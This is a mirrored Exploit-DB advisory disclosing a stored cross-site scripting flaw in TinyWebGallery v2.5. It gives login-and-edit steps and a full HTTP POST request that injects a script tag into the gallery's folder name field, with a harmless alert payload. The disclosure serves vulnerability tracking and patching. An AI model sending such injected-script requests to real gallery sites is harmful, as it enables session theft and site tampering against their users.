6
[webapps] TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
source link: https://www.exploit-db.com/exploits/51442
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
EDB-ID:
51442
EDB Verified:
#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
3. Edit
4. Set folder name section as <script>alert(4)</script>
Request :
POST /twg25/i_frames/i_titel.php HTTP/1.1
Host: localhost
Content-Length: 264
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close
twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save
5. Go to http://localhost/twg25/index.php
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK